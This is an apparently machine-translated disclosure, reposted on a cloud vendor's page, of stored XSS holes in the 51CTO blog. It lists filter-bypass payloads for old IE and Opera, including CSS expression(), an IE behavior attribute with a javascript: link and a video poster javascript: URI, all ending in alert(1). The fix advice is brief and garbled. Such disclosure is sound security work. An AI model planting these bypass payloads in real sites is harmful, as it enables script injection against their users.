51CTO blog stores XSS in multiple places, various bypass skills

Source: Internet
Author: User

1. Replace the expression in the style with the fullwidth character only for the xss that is valid for IE6. <Div style = "x: expression (alert (1)"> IE6 </div> 2, IE6-IE8, IE9 compatible mode valid xss, insert the following code, when you click test, the xss is triggered. <A style = "behavior: url (# default # AnchorClick);" folder = "javascript: alert (1)"> test </a> 3, only later versions of Opera will trigger <video body = "" poster = "javascript: alert (1) //" tabindex = "0"> </video> insert code. 4. Cross-style http://3407504.blog.51cto.com/3397504/1059235 http://3407504.blog.51cto.com/3397504/1090792
Solution: 1. Conversion character encoding. 2. behavior limit? Add _ blank after the code.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.